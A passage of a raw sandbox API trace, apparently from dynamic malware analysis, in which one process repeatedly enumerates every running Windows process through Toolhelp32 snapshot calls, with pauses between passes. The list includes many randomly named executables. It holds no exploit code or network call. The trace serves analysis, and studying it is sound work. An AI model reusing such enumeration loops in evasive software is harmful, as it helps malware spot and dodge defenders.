(in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0131.019] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0131.020] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.021] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0131.022] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0131.023] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0131.024] CloseHandle (hObject=0xbc) returned 1 [0131.024] Sleep (dwMilliseconds=0x12c) [0131.380] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0131.385] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0131.386] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0131.387] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0131.387] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, 
th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0131.388] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0131.389] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0131.389] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0131.390] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0131.391] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0131.391] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0131.392] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.393] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.394] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.394] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.395] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.396] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0131.396] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.397] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.397] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0131.399] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.400] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0131.401] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0131.402] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0131.403] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0131.404] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.405] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0131.407] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0131.408] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0131.409] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0131.410] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0131.411] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0131.412] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0131.414] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0131.415] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0131.416] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0131.417] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0131.418] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0131.419] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0131.420] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0131.422] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0131.423] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0131.510] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0131.511] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0131.513] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0131.514] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0131.515] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0131.517] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.518] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0131.519] CloseHandle (hObject=0xc4) returned 1 [0131.519] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0131.524] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0131.524] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0131.525] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0131.526] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, 
dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0131.526] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0131.527] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0131.527] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0131.528] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0131.529] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0131.529] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0131.530] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0131.531] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.531] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.532] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.533] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.533] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0131.534] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.535] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0131.535] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0131.536] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0131.538] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0131.539] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0131.540] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0131.541] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0131.542] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0131.543] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0131.544] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0131.545] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, 